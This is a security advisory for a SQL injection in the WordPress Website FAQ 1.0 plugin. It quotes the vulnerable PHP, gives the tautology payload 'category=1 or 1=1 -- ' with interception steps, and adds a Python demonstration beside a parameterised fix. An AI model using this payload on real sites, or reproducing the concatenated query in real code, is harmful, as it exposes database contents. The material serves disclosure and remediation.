WordPress Website FAQ 1.0 SQL Injection

2012.06.27
Credit: Chris Kellum
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: WordPress Website FAQ Plugin v1.0 SQL Injection
# Date: 6/25/12
# Exploit Author: Chris Kellum
# Vendor Homepage: http://wordpress.org/extend/plugins/website-faq/
# Software Link: http://downloads.wordpress.org/plugin/website-faq.zip
# Version: 1.0

==============================================================================
Vulnerability location: /wp-content/plugins/website-faq/website-faq-widget.php
==============================================================================

Lines 106-115:

function displayAnswer() {
    global $wpdb;
    $master_table = $wpdb->prefix . "faq";
    $category = $_POST['category'];      // taken straight from the POST body, no validation
    $searchtxt = $_POST['searchtxt'];    // likewise unsanitized
    if($category!=0) {
        // Both values are concatenated into the SQL text: $category unquoted
        // after faq_category=, $searchtxt inside the LIKE string literal.
        $sql = "SELECT * FROM $master_table WHERE faq_category=".$category." AND faq_question LIKE '%".$searchtxt."%'";
    }
    // remainder of displayAnswer() (execution of $sql and output) is not reproduced in the advisory

===============================================================
Vulnerability Details: category parameter (column faq_category) vulnerable to SQL injection
===============================================================

When submitting a query via the widget, intercept the POST request with Burp or another proxy. The request body looks like this:

action=displayAnswer&category=1&searchtxt=[your query]

Changing category=1 to category=1 or 1=1 -- (URL-encoded: category=1+or+1%3D1+--+; MySQL only treats -- as a comment when it is followed by whitespace) demonstrates the injection: the comment discards the rest of the WHERE clause, so every row of the faq table is returned regardless of the searchtxt value. Because $category is inserted without quotes, no quote character is needed to break out of the query. Note also that $searchtxt is concatenated into the LIKE string with the same lack of sanitization, so a single quote in that parameter is a second injection point in the same statement.
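The following is an added example, not code from the advisory or from the plugin: a Python port of the plugin's query construction run against an in-memory SQLite table, beside a hardened version. The table name wp_faq, the two columns and the sample rows are constructed here for illustration; the real plugin table has more columns, and the plugin itself executes the statement through $wpdb against MySQL. The example shows that the advisory's category payload returns every row no matter what searchtxt contains, that searchtxt is a second injection point, and that an integer cast plus a bound parameter closes both.

```python
import sqlite3

# Constructed sample rows standing in for the plugin's wp_faq table
# (assumption: only the two columns the query touches are modelled).
SAMPLE_ROWS = [
    (1, "How do I reset my password?"),
    (1, "Where is my order?"),
    (2, "Do you ship internationally?"),
]


def make_db():
    """Build an in-memory table seeded with SAMPLE_ROWS."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE wp_faq (faq_category INTEGER, faq_question TEXT)")
    conn.executemany("INSERT INTO wp_faq VALUES (?, ?)", SAMPLE_ROWS)
    return conn


def display_answer_vulnerable(conn, category, searchtxt):
    """Port of the plugin's query construction: both request values are
    concatenated into the SQL text, category unquoted and searchtxt inside
    the LIKE literal, exactly as in website-faq-widget.php."""
    sql = ("SELECT * FROM wp_faq WHERE faq_category=" + category
           + " AND faq_question LIKE '%" + searchtxt + "%'")
    return conn.execute(sql).fetchall()


def escape_like(s):
    """Escape LIKE metacharacters so user input is matched literally."""
    return s.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")


def display_answer_fixed(conn, category, searchtxt):
    """Hardened form: category is coerced to an integer and searchtxt is
    passed as a bound parameter, so neither value can change the query."""
    try:
        category_id = int(category)
    except ValueError:
        return []  # "1 or 1=1 -- " is not a category id; refuse it
    pattern = "%" + escape_like(searchtxt) + "%"
    sql = ("SELECT * FROM wp_faq WHERE faq_category=? "
           "AND faq_question LIKE ? ESCAPE '\\'")
    return conn.execute(sql, (category_id, pattern)).fetchall()


if __name__ == "__main__":
    db = make_db()
    payload = "1 or 1=1 -- "
    # Vulnerable: all three rows come back although no question contains "nomatch".
    print(display_answer_vulnerable(db, payload, "nomatch"))
    # Hardened: the payload is rejected before any SQL runs.
    print(display_answer_fixed(db, payload, "nomatch"))
```

In the plugin itself the equivalent fix is to build the statement with $wpdb->prepare(), using %d for the category and %s for the search term (with the term passed through WordPress's LIKE-escaping helper before the wildcards are added), instead of string concatenation.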

References:

http://wordpress.org/extend/plugins/website-faq/


Copyright 2024, cxsecurity.com

 
